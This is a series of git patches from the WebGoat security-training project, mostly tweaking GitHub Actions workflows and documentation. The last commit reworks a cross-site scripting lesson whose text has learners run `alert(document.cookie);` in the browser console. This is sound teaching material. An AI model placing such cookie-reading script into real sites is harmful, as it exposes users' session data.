--- a/.github/workflows/master_branch_pr.yml
+++ b/.github/workflows/master_branch_pr.yml
@@ -15,4 +15,6 @@ jobs:
 
             It looks like this pull request has been made against the ${{github.event.pull_request.head.repo.full_name}} `master` branch.
             Since we use Git Flow all commits to master are through are from the develop branch.
-            You do not need to close this PR, you can change the target branch to `development` by clicking the _"Edit"_ button at the top of this page.
\ No newline at end of file
+            You do not need to close this PR, you can change the target branch to `development` by clicking the _"Edit"_ button at the top of this page.
+          repo-token: ${{ secrets.GITHUB_TOKEN }}
+          allow-repeats: false
\ No newline at end of file

From 05bef55c802a144cfb170793df598e83f66aafe4 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Wed, 29 Sep 2021 18:42:25 +0200
Subject: [PATCH 033/227] Add action to warn against PR against master (should
 be develop)

---
 .github/workflows/master_branch_pr.yml | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/.github/workflows/master_branch_pr.yml b/.github/workflows/master_branch_pr.yml
index 8f782c385..814164de2 100644
--- a/.github/workflows/master_branch_pr.yml
+++ b/.github/workflows/master_branch_pr.yml
@@ -7,6 +7,13 @@ jobs:
   test:
     runs-on: ubuntu-latest
     steps:
+      - name: 'Comment PR'
+        uses: actions/github-script@0.3.0
+        with:
+          github-token: ${{ secrets.GITHUB_TOKEN }}
+          script: |
+            const { issue: { number: issue_number }, repo: { owner, repo }  } = context;
+            github.issues.createComment({ issue_number, owner, repo, body: 'Hello world ! 👋' });
       - name: Post PR comment
         uses: mshick/add-pr-comment@v1
         with:

From 902af04dd4d9756cab7b0c782ead0cf4a849b23e Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Wed, 29 Sep 2021 18:45:00 +0200
Subject: [PATCH 034/227] Add action to warn against PR against master (should
 be develop)

---
 .github/workflows/master_branch_pr.yml | 7 -------
 1 file changed, 7 deletions(-)

diff --git a/.github/workflows/master_branch_pr.yml b/.github/workflows/master_branch_pr.yml
index 814164de2..8f782c385 100644
--- a/.github/workflows/master_branch_pr.yml
+++ b/.github/workflows/master_branch_pr.yml
@@ -7,13 +7,6 @@ jobs:
   test:
     runs-on: ubuntu-latest
     steps:
-      - name: 'Comment PR'
-        uses: actions/github-script@0.3.0
-        with:
-          github-token: ${{ secrets.GITHUB_TOKEN }}
-          script: |
-            const { issue: { number: issue_number }, repo: { owner, repo }  } = context;
-            github.issues.createComment({ issue_number, owner, repo, body: 'Hello world ! 👋' });
       - name: Post PR comment
         uses: mshick/add-pr-comment@v1
         with:

From 906ab766df93e012e4c4dba49296adfd63763dc9 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Wed, 29 Sep 2021 18:57:29 +0200
Subject: [PATCH 035/227] Add action to warn against PR against master (should
 be develop)

---
 .github/workflows/master_branch_pr.yml | 18 ++++++++----------
 1 file changed, 8 insertions(+), 10 deletions(-)

diff --git a/.github/workflows/master_branch_pr.yml b/.github/workflows/master_branch_pr.yml
index 8f782c385..7123e33b9 100644
--- a/.github/workflows/master_branch_pr.yml
+++ b/.github/workflows/master_branch_pr.yml
@@ -7,14 +7,12 @@ jobs:
   test:
     runs-on: ubuntu-latest
     steps:
-      - name: Post PR comment
-        uses: mshick/add-pr-comment@v1
-        with:
-          message: |
-            Hi @${{ github.event.pull_request.user.login }},
+      - uses: wow-actions/auto-comment@v1
+          with:
+            GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
 
-            It looks like this pull request has been made against the ${{github.event.pull_request.head.repo.full_name}} `master` branch.
-            Since we use Git Flow all commits to master are through are from the develop branch.
-            You do not need to close this PR, you can change the target branch to `development` by clicking the _"Edit"_ button at the top of this page.
-          repo-token: ${{ secrets.GITHUB_TOKEN }}
-          allow-repeats: false
\ No newline at end of file
+            pullRequestOpened: |
+              👋 @{{ author }}
+              It looks like this pull request has been made against the ${{github.event.pull_request.head.repo.full_name}} `master` branch.
+              Since we use Git Flow all commits to master are through are from the develop branch.
+              You do not need to close this PR, you can change the target branch to `development` by clicking the _"Edit"_ button at the top of this page.
\ No newline at end of file

From 14bb53d43a2ac976ca7536d75de149ae4bb45680 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Wed, 29 Sep 2021 19:00:29 +0200
Subject: [PATCH 036/227] Add action to warn against PR against master (should
 be develop)

---
 .github/workflows/master_branch_pr.yml | 14 +++++++-------
 1 file changed, 7 insertions(+), 7 deletions(-)

diff --git a/.github/workflows/master_branch_pr.yml b/.github/workflows/master_branch_pr.yml
index 7123e33b9..a184aa71b 100644
--- a/.github/workflows/master_branch_pr.yml
+++ b/.github/workflows/master_branch_pr.yml
@@ -8,11 +8,11 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - uses: wow-actions/auto-comment@v1
-          with:
-            GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        with:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
 
-            pullRequestOpened: |
-              👋 @{{ author }}
-              It looks like this pull request has been made against the ${{github.event.pull_request.head.repo.full_name}} `master` branch.
-              Since we use Git Flow all commits to master are through are from the develop branch.
-              You do not need to close this PR, you can change the target branch to `development` by clicking the _"Edit"_ button at the top of this page.
\ No newline at end of file
+          pullRequestOpened: |
+            👋 @{{ author }}
+            It looks like this pull request has been made against the ${{github.event.pull_request.head.repo.full_name}} `master` branch.
+            Since we use Git Flow all commits to master are through are from the develop branch.
+            You do not need to close this PR, you can change the target branch to `development` by clicking the _"Edit"_ button at the top of this page.
\ No newline at end of file

From b7a1edd04a602a91e3876fb209e5b78e1b447c58 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Wed, 29 Sep 2021 19:56:22 +0200
Subject: [PATCH 037/227] Use CLA again and add action to recheck it

---
 .github/workflows/master_branch_pr.yml | 18 ----------
 .github/workflows/recheck-cla.yml      | 14 ++++++++
 .github/workflows/signoff_mr.yml       | 47 --------------------------
 PULL_REQUEST_TEMPLATE.md               |  1 -
 4 files changed, 14 insertions(+), 66 deletions(-)
 delete mode 100644 .github/workflows/master_branch_pr.yml
 create mode 100644 .github/workflows/recheck-cla.yml
 delete mode 100644 .github/workflows/signoff_mr.yml

diff --git a/.github/workflows/master_branch_pr.yml b/.github/workflows/master_branch_pr.yml
deleted file mode 100644
index a184aa71b..000000000
--- a/.github/workflows/master_branch_pr.yml
+++ /dev/null
@@ -1,18 +0,0 @@
-on:
-  pull_request:
-  pull_request_target:
-    branches: [master]
-
-jobs:
-  test:
-    runs-on: ubuntu-latest
-    steps:
-      - uses: wow-actions/auto-comment@v1
-        with:
-          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
-
-          pullRequestOpened: |
-            👋 @{{ author }}
-            It looks like this pull request has been made against the ${{github.event.pull_request.head.repo.full_name}} `master` branch.
-            Since we use Git Flow all commits to master are through are from the develop branch.
-            You do not need to close this PR, you can change the target branch to `development` by clicking the _"Edit"_ button at the top of this page.
\ No newline at end of file
diff --git a/.github/workflows/recheck-cla.yml b/.github/workflows/recheck-cla.yml
new file mode 100644
index 000000000..940a68823
--- /dev/null
+++ b/.github/workflows/recheck-cla.yml
@@ -0,0 +1,14 @@
+name: "Check CLA signed"
+on:
+  issue_comment:
+    types: [created]
+jobs:
+  rebase:
+    name: signed
+    if: github.repository == 'WebGoat/WebGoat' && github.event.issue.pull_request != '' && contains(github.event.comment.body, '/cla') && github.event.comment.author_association == 'MEMBER'
+    runs-on: ubuntu-latest
+    steps:
+      - name: Recheck CLA
+        run: |
+          echo "Rechecking PR ${{ github.event.number }}"
+          curl "https://cla-assistant.io/check/WebGoat/WebGoat?pullRequest=${{ github.event.number }}
\ No newline at end of file
diff --git a/.github/workflows/signoff_mr.yml b/.github/workflows/signoff_mr.yml
deleted file mode 100644
index 6c5ea27d1..000000000
--- a/.github/workflows/signoff_mr.yml
+++ /dev/null
@@ -1,47 +0,0 @@
-on: issue_comment
-
-jobs:
-  build:
-    runs-on: ubuntu-latest
-    steps:
-      - uses: actions/github-script@0.3.0
-        if: github.event.action == 'created'
-        with:
-          github-token: ${{ secrets.GITHUB_TOKEN }}
-          script: |
-            const isValidSignOff = (
-              context.payload.action === 'created' &&
-              context.payload.issue.pull_request &&
-              context.payload.comment.user.id === context.payload.issue.user.id &&
-              context.payload.comment.body === '/signoff'
-            )
-            if (!isValidSignOff) return
-            const pr = await github.pulls.get({
-              ...context.repo,
-              pull_number: context.payload.issue.number
-            })
-            const commits = await github.pulls.listCommits({
-              ...context.repo,
-              pull_number: context.payload.issue.number
-            })
-            const baseCommit = await github.git.getCommit({
-              ...context.repo,
-              commit_sha: pr.data.head.sha
-            })
-            const tree = await github.git.getTree({
-              ...context.repo,
-              tree_sha: baseCommit.data.tree.sha
-            })
-            const commitLines = commits.data.map(item => `- ${item.sha.slice(0, 6)}: ${item.commit.message}`).join('\n')
-            const header = `I, @${context.payload.comment.user.login}, hereby signoff on these commits:`
-            const newCommit = await github.git.createCommit({
-              ...context.repo,
-              message: `${header}\n\n${commitLines}`,
-              tree: tree.data.sha,
-              parents: [pr.data.head.sha]
-            })
-            await github.git.updateRef({
-              ...context.repo,
-              ref: `heads/${pr.data.head.ref}`,
-              sha: newCommit.data.sha
-            })
\ No newline at end of file
diff --git a/PULL_REQUEST_TEMPLATE.md b/PULL_REQUEST_TEMPLATE.md
index 0f4d52c1a..8c1052540 100644
--- a/PULL_REQUEST_TEMPLATE.md
+++ b/PULL_REQUEST_TEMPLATE.md
@@ -1,7 +1,6 @@
 Thank you for submitting a Pull Request to the WebGoat. Please make sure that:
 
 - [ ] Status checks have passed (e.g. packaging, linting, testing are fine)
-- [ ] Commits are [signed off](https://git-scm.com/docs/git-commit#Documentation/git-commit.txt--s) or you have a commit which you amend with `git commit -m "Sign off" --amend --signof`. See [Contributing.md](https://github.com/WebGoat/WebGoat/blob/develop/CONTRIBUTING.md) for more details.
 
 If your PR is related to an issue. Please end your PR test with the following line:
 This PR closes #< insert number here >.
\ No newline at end of file

From fbf18440fb391046d75859ed09c2e9bedc883e52 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Wed, 29 Sep 2021 20:02:42 +0200
Subject: [PATCH 038/227] Revert "Use CLA again and add action to recheck it"

This reverts commit b7a1edd0
---
 .github/workflows/master_branch_pr.yml | 18 ++++++++++
 .github/workflows/recheck-cla.yml      | 14 --------
 .github/workflows/signoff_mr.yml       | 47 ++++++++++++++++++++++++++
 3 files changed, 65 insertions(+), 14 deletions(-)
 create mode 100644 .github/workflows/master_branch_pr.yml
 delete mode 100644 .github/workflows/recheck-cla.yml
 create mode 100644 .github/workflows/signoff_mr.yml

diff --git a/.github/workflows/master_branch_pr.yml b/.github/workflows/master_branch_pr.yml
new file mode 100644
index 000000000..a184aa71b
--- /dev/null
+++ b/.github/workflows/master_branch_pr.yml
@@ -0,0 +1,18 @@
+on:
+  pull_request:
+  pull_request_target:
+    branches: [master]
+
+jobs:
+  test:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: wow-actions/auto-comment@v1
+        with:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+
+          pullRequestOpened: |
+            👋 @{{ author }}
+            It looks like this pull request has been made against the ${{github.event.pull_request.head.repo.full_name}} `master` branch.
+            Since we use Git Flow all commits to master are through are from the develop branch.
+            You do not need to close this PR, you can change the target branch to `development` by clicking the _"Edit"_ button at the top of this page.
\ No newline at end of file
diff --git a/.github/workflows/recheck-cla.yml b/.github/workflows/recheck-cla.yml
deleted file mode 100644
index 940a68823..000000000
--- a/.github/workflows/recheck-cla.yml
+++ /dev/null
@@ -1,14 +0,0 @@
-name: "Check CLA signed"
-on:
-  issue_comment:
-    types: [created]
-jobs:
-  rebase:
-    name: signed
-    if: github.repository == 'WebGoat/WebGoat' && github.event.issue.pull_request != '' && contains(github.event.comment.body, '/cla') && github.event.comment.author_association == 'MEMBER'
-    runs-on: ubuntu-latest
-    steps:
-      - name: Recheck CLA
-        run: |
-          echo "Rechecking PR ${{ github.event.number }}"
-          curl "https://cla-assistant.io/check/WebGoat/WebGoat?pullRequest=${{ github.event.number }}
\ No newline at end of file
diff --git a/.github/workflows/signoff_mr.yml b/.github/workflows/signoff_mr.yml
new file mode 100644
index 000000000..6c5ea27d1
--- /dev/null
+++ b/.github/workflows/signoff_mr.yml
@@ -0,0 +1,47 @@
+on: issue_comment
+
+jobs:
+  build:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/github-script@0.3.0
+        if: github.event.action == 'created'
+        with:
+          github-token: ${{ secrets.GITHUB_TOKEN }}
+          script: |
+            const isValidSignOff = (
+              context.payload.action === 'created' &&
+              context.payload.issue.pull_request &&
+              context.payload.comment.user.id === context.payload.issue.user.id &&
+              context.payload.comment.body === '/signoff'
+            )
+            if (!isValidSignOff) return
+            const pr = await github.pulls.get({
+              ...context.repo,
+              pull_number: context.payload.issue.number
+            })
+            const commits = await github.pulls.listCommits({
+              ...context.repo,
+              pull_number: context.payload.issue.number
+            })
+            const baseCommit = await github.git.getCommit({
+              ...context.repo,
+              commit_sha: pr.data.head.sha
+            })
+            const tree = await github.git.getTree({
+              ...context.repo,
+              tree_sha: baseCommit.data.tree.sha
+            })
+            const commitLines = commits.data.map(item => `- ${item.sha.slice(0, 6)}: ${item.commit.message}`).join('\n')
+            const header = `I, @${context.payload.comment.user.login}, hereby signoff on these commits:`
+            const newCommit = await github.git.createCommit({
+              ...context.repo,
+              message: `${header}\n\n${commitLines}`,
+              tree: tree.data.sha,
+              parents: [pr.data.head.sha]
+            })
+            await github.git.updateRef({
+              ...context.repo,
+              ref: `heads/${pr.data.head.ref}`,
+              sha: newCommit.data.sha
+            })
\ No newline at end of file

From 74ca2ff12a349dd87b2c2ef658b067e23ae68c12 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Wed, 29 Sep 2021 20:03:09 +0200
Subject: [PATCH 039/227] Add signed commits to pull request template

---
 PULL_REQUEST_TEMPLATE.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/PULL_REQUEST_TEMPLATE.md b/PULL_REQUEST_TEMPLATE.md
index 8c1052540..0f4d52c1a 100644
--- a/PULL_REQUEST_TEMPLATE.md
+++ b/PULL_REQUEST_TEMPLATE.md
@@ -1,6 +1,7 @@
 Thank you for submitting a Pull Request to the WebGoat. Please make sure that:
 
 - [ ] Status checks have passed (e.g. packaging, linting, testing are fine)
+- [ ] Commits are [signed off](https://git-scm.com/docs/git-commit#Documentation/git-commit.txt--s) or you have a commit which you amend with `git commit -m "Sign off" --amend --signof`. See [Contributing.md](https://github.com/WebGoat/WebGoat/blob/develop/CONTRIBUTING.md) for more details.
 
 If your PR is related to an issue. Please end your PR test with the following line:
 This PR closes #< insert number here >.
\ No newline at end of file

From 360cdc7239d24c7dafc0a4b2417a5ee448231206 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Wed, 29 Sep 2021 16:20:12 +0200
Subject: [PATCH 040/227] Fix broken link

---
 CONTRIBUTING.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index e87d63fd6..b478ac14d 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -9,7 +9,7 @@ This document describes how you can contribute to WebGoat. Please read it carefu
 
 * [How to Contribute to the Project](#how-to-contribute-to-the-project)
 * [How to set up your Contributor Environment](#how-to-set-up-your-contributor-environment)
-* [How to get your PR Accepted](#how-to-get-your-pr-acceted)
+* [How to get your PR Accepted](#how-to-get-your-pr-accepted)
 
 ## How to Contribute to the project
 

From b6dff3f32bf04ae2e8be3f44b05a035f2e835926 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Wed, 29 Sep 2021 16:16:57 +0200
Subject: [PATCH 041/227] Update JDK references

---
 README.MD | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/README.MD b/README.MD
index 490520bde..1e83478ef 100644
--- a/README.MD
+++ b/README.MD
@@ -3,7 +3,7 @@
 [![Build](https://github.com/WebGoat/WebGoat/actions/workflows/build.yml/badge.svg)](https://github.com/WebGoat/WebGoat/actions/workflows/build.yml)
 [![Coverage Status](https://coveralls.io/repos/WebGoat/WebGoat/badge.svg?branch=develop&service=github)](https://coveralls.io/github/WebGoat/WebGoat?branch=master)
 [![Codacy Badge](https://api.codacy.com/project/badge/b69ee3a86e3b4afcaf993f210fccfb1d)](https://www.codacy.com/app/dm/WebGoat)
-[![java-jdk](https://img.shields.io/badge/java%20jdk-15-green.svg)](https://jdk.java.net/)
+[![java-jdk](https://img.shields.io/badge/java%20jdk-16-green.svg)](https://jdk.java.net/)
 [![OWASP Labs](https://img.shields.io/badge/owasp-lab%20project-f7b73c.svg)](https://www.owasp.org/index.php/OWASP_Project_Inventory#tab=Labs_Projects)
 [![GitHub release](https://img.shields.io/github/release/WebGoat/WebGoat.svg)](https://github.com/WebGoat/WebGoat/releases/latest)
 [![Gitter](https://badges.gitter.im/OWASPWebGoat/community.svg)](https://gitter.im/OWASPWebGoat/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)
@@ -68,7 +68,7 @@ WebWolf will be located at: http://localhost:9090/WebWolf (change ports if neces
 
 ### Prerequisites:
 
-* Java 15
+* Java 16
 * Maven > 3.2.1
 * Your favorite IDE
 * Git, or Git support in your IDE

From 7602781a5bfeaaa8d5e42fc46fe951853ca08511 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Thu, 30 Sep 2021 09:09:08 +0000
Subject: [PATCH 042/227] Bump actions/github-script from 0.3.0 to 5

Bumps [actions/github-script](https://github.com/actions/github-script) from 0.3.0 to 5.
- [Release notes](https://github.com/actions/github-script/releases)
- [Commits](https://github.com/actions/github-script/compare/0.3.0...v5)

---
updated-dependencies:
- dependency-name: actions/github-script
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] <support@github.com>
---
 .github/workflows/signoff_mr.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.github/workflows/signoff_mr.yml b/.github/workflows/signoff_mr.yml
index 6c5ea27d1..5838fd79c 100644
--- a/.github/workflows/signoff_mr.yml
+++ b/.github/workflows/signoff_mr.yml
@@ -4,7 +4,7 @@ jobs:
   build:
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/github-script@0.3.0
+      - uses: actions/github-script@v5
         if: github.event.action == 'created'
         with:
           github-token: ${{ secrets.GITHUB_TOKEN }}

From f28bb09724fe6b3e3d6484a5fe9943d7b19904b7 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Thu, 30 Sep 2021 16:54:52 +0200
Subject: [PATCH 043/227] Remove action

---
 .github/workflows/master_branch_pr.yml | 18 ------------------
 1 file changed, 18 deletions(-)
 delete mode 100644 .github/workflows/master_branch_pr.yml

diff --git a/.github/workflows/master_branch_pr.yml b/.github/workflows/master_branch_pr.yml
deleted file mode 100644
index a184aa71b..000000000
--- a/.github/workflows/master_branch_pr.yml
+++ /dev/null
@@ -1,18 +0,0 @@
-on:
-  pull_request:
-  pull_request_target:
-    branches: [master]
-
-jobs:
-  test:
-    runs-on: ubuntu-latest
-    steps:
-      - uses: wow-actions/auto-comment@v1
-        with:
-          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
-
-          pullRequestOpened: |
-            👋 @{{ author }}
-            It looks like this pull request has been made against the ${{github.event.pull_request.head.repo.full_name}} `master` branch.
-            Since we use Git Flow all commits to master are through are from the develop branch.
-            You do not need to close this PR, you can change the target branch to `development` by clicking the _"Edit"_ button at the top of this page.
\ No newline at end of file

From 5164514789f129af5572b0c872aff0ad019e45d9 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Thu, 30 Sep 2021 17:09:21 +0200
Subject: [PATCH 044/227] Remove Slack integration from build as it needs a
 token and will never work when PR is received from a fork.

---
 .github/workflows/build.yml | 12 ------------
 1 file changed, 12 deletions(-)

diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index 5a913a9f7..df196213e 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -44,15 +44,3 @@ jobs:
           restore-keys: ${{ runner.os }}-m2
       - name: Build with Maven
         run: mvn clean install
-
-  notify-slack:
-    if: github.repository == 'WebGoat/WebGoat' && github.event_name == 'push' && (success() || failure())
-    needs:
-      - build
-    runs-on: ubuntu-latest
-    steps:
-      - name: "Slack workflow notification"
-        uses: Gamesight/slack-workflow-status@master
-        with:
-          repo_token: ${{secrets.GITHUB_TOKEN}}
-          slack_webhook_url: ${{secrets.SLACK_WEBHOOK_URL}}
\ No newline at end of file

From 5adf1d1dd70cca753895977273eba22456a30e48 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Thu, 30 Sep 2021 17:11:08 +0200
Subject: [PATCH 045/227] Renaming the actions

---
 .github/workflows/{quality_checks.yml => branch_build.yml} | 2 +-
 .github/workflows/{build.yml => pr_build.yml}              | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
 rename .github/workflows/{quality_checks.yml => branch_build.yml} (97%)
 rename .github/workflows/{build.yml => pr_build.yml} (97%)

diff --git a/.github/workflows/quality_checks.yml b/.github/workflows/branch_build.yml
similarity index 97%
rename from .github/workflows/quality_checks.yml
rename to .github/workflows/branch_build.yml
index 7e68e6000..41dc36375 100644
--- a/.github/workflows/quality_checks.yml
+++ b/.github/workflows/branch_build.yml
@@ -1,4 +1,4 @@
-name: "Testing and linting"
+name: "Branch build"
 on:
   push:
     branches-ignore:
diff --git a/.github/workflows/build.yml b/.github/workflows/pr_build.yml
similarity index 97%
rename from .github/workflows/build.yml
rename to .github/workflows/pr_build.yml
index df196213e..6584fe04f 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/pr_build.yml
@@ -1,4 +1,4 @@
-name: "Build"
+name: "Pull request build"
 on:
   pull_request:
     paths-ignore:

From 8e6d87d429e58e97d1143f4530ed9d1fdd33b73d Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Thu, 30 Sep 2021 18:53:27 +0200
Subject: [PATCH 046/227] Remove unnecessary action

---
 .github/workflows/rebase.yml | 19 -------------------
 1 file changed, 19 deletions(-)
 delete mode 100644 .github/workflows/rebase.yml

diff --git a/.github/workflows/rebase.yml b/.github/workflows/rebase.yml
deleted file mode 100644
index 5889c17c4..000000000
--- a/.github/workflows/rebase.yml
+++ /dev/null
@@ -1,19 +0,0 @@
-name: "Automatic Rebase"
-on:
-  issue_comment:
-    types: [created]
-jobs:
-  rebase:
-    name: Rebase
-    if: github.repository == 'WebGoat/WebGoat' && github.event.issue.pull_request != '' && contains(github.event.comment.body, '/rebase') && github.event.comment.author_association == 'MEMBER'
-    runs-on: ubuntu-latest
-    steps:
-      - name: Checkout the latest code
-        uses: actions/checkout@v2
-        with:
-          token: ${{ secrets.GITHUB_TOKEN }}
-          fetch-depth: 0 # otherwise, you will fail to push refs to dest repo
-      - name: Automatic Rebase
-        uses: cirrus-actions/rebase@1.4
-        env:
-          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
\ No newline at end of file

From dfa0e1cdca202a9e3ccff0c4b6c1cfb5e982cd06 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Fri, 1 Oct 2021 19:45:24 +0200
Subject: [PATCH 047/227] XSS Lesson one boolean response
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: Àngel Ollé Blázquez <angel@olleb.com>
---
 .../test/java/org/owasp/webgoat/XSSTest.java  |  2 +-
 .../xss/CrossSiteScriptingLesson1.java        |  4 +-
 .../resources/html/CrossSiteScripting.html    |  3 +-
 .../resources/i18n/WebGoatLabels.properties   |  2 +-
 .../en/CrossSiteScripting_content1.adoc       |  5 +-
 .../xss/CrossSiteScriptingLesson1Test.java    | 76 +++++++++++++++++++
 6 files changed, 84 insertions(+), 8 deletions(-)
 create mode 100644 webgoat-lessons/cross-site-scripting/src/test/java/org/owasp/webgoat/xss/CrossSiteScriptingLesson1Test.java

diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XSSTest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XSSTest.java
index 8d01547d9..83c35e320 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XSSTest.java
+++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XSSTest.java
@@ -16,7 +16,7 @@ public class XSSTest extends IntegrationTest {
 
         Map<String, Object> params = new HashMap<>();
         params.clear();
-        params.put("answer_xss_1", "yes");
+        params.put("checkboxAttack1", "value");
         checkAssignment(url("/CrossSiteScripting/attack1"), params, true);
 
         params.clear();
diff --git a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/CrossSiteScriptingLesson1.java b/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/CrossSiteScriptingLesson1.java
index 3f988a8e2..f9141c93d 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/CrossSiteScriptingLesson1.java
+++ b/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/CrossSiteScriptingLesson1.java
@@ -36,8 +36,8 @@ public class CrossSiteScriptingLesson1 extends AssignmentEndpoint {
 
     @PostMapping("/CrossSiteScripting/attack1")
     @ResponseBody
-    public AttackResult completed(@RequestParam String answer_xss_1) {
-        if (answer_xss_1.toString().toLowerCase().equals("yes")) {
+    public AttackResult completed(@RequestParam(value = "checkboxAttack1", required = false) String checkboxValue) {
+        if (checkboxValue != null) {
             return success(this).build();
         } else {
             return failed(this).feedback("xss.lesson1.failure").build();
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/html/CrossSiteScripting.html b/webgoat-lessons/cross-site-scripting/src/main/resources/html/CrossSiteScripting.html
index f4a037966..93f4d6d09 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/html/CrossSiteScripting.html
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/html/CrossSiteScripting.html
@@ -15,8 +15,7 @@
 				  action="/WebGoat/CrossSiteScripting/attack1">
 				<table>
 					<tr>
-						<td>Were the cookies the same on each tab?</td>
-						<td><input name="answer_xss_1" value="" type="TEXT" /></td>
+						<td><input type="checkbox" name="checkboxAttack1"> The cookies are the same on each tab </td>
 						<td><input
 								name="answer" value="Submit" type="SUBMIT"/></td>
 						<td></td>
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/i18n/WebGoatLabels.properties b/webgoat-lessons/cross-site-scripting/src/main/resources/i18n/WebGoatLabels.properties
index 91d3fff5b..81b40e219 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/i18n/WebGoatLabels.properties
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/i18n/WebGoatLabels.properties
@@ -17,7 +17,7 @@ xss-reflected-6a-hint-1=To search through the client side code, use the develope
 xss-reflected-6a-hint-2=Since you are looking for application code, check the WebGoat/js/goatApp folder for a file that could handle the routes.
 xss-reflected-6a-hint-3=Make sure you add the base route at the start, when submitting your solution.
 xss-reflected-6a-hint-4=Still did not find it? Check the <a href="/WebGoat/js/goatApp/view/GoatRouter.js" target="_blank">GoatRouter.js</a> file. It should be pretty easy to determine.
-xss.lesson1.failure=Are you sure? Try using a tab from a different site.
+xss.lesson1.failure=The cookies should be the same on both tabs. Ensure that the tabs are from the same site.
 xss-dom-message-success=Correct, I hope you did not cheat, using the console!
 xss-dom-message-failure=Incorrect, keep trying. It should be obvious in the log when you are successful.
 xss-dom-message-hint-1=Open a new tab and navigate to the test-route you just figured out in the previous lesson.
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content1.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content1.adoc
index 4e64a7c83..4771c4e61 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content1.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content1.adoc
@@ -28,5 +28,6 @@ alert(document.cookie);
 
 == Try It!  Using Chrome or Firefox
 
-* Open a second tab and use the same url as this page you are currently on (or any url within this instance of WebGoat)
-* Then, on that second that open the browser developer tools and open the javascript console. And type:  `alert(document.cookie);` .
+* Open a second tab and use the same url as this page you are currently on (or any URL within this instance of WebGoat).
+* Then, on that second tab open the browser developer tools and open the javascript console. And type:  `alert(document.cookie);`.
+* The cookies should be the same on each tab.
diff --git a/webgoat-lessons/cross-site-scripting/src/test/java/org/owasp/webgoat/xss/CrossSiteScriptingLesson1Test.java b/webgoat-lessons/cross-site-scripting/src/test/java/org/owasp/webgoat/xss/CrossSiteScriptingLesson1Test.java
new file mode 100644
index 000000000..3f2c0f48e
--- /dev/null
+++ b/webgoat-lessons/cross-site-scripting/src/test/java/org/owasp/webgoat/xss/CrossSiteScriptingLesson1Test.java
@@ -0,0 +1,76 @@
+/*
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
+ *
